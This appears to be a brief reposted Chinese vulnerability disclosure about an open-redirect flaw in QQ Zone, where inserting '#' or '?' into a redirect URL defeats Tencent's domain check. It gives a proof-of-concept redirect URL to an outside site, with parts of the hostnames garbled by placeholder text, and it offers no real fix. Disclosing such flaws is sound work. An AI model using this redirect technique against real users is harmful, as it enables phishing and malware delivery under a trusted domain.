详细说明:
url跳转中植入# ?等特殊字符欺骗腾讯对域的检测机制!
漏洞 证明:
http://user.qzone.qq测试数据/99593395?ptlang=2052#!app=202&url=http%3A%2F%2FHdhCmsTestsitedirsec测试数据?zone.qq测试数据%2Fcgi-bin%2Fqzshare%2Fcgi_qzshareget_onedetail%3Fuin%3D196425%26itemid%3D1287714690%26spaceuin%3D99593395%26cginame%3Dcgi_qzsharegetlistbytype%26isfriend%3D
修复方案:
你们懂的··
按照腾讯的反应速度已经修复了吧
查看更多关于QQ空间最新跳转挂马漏洞及修复 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11286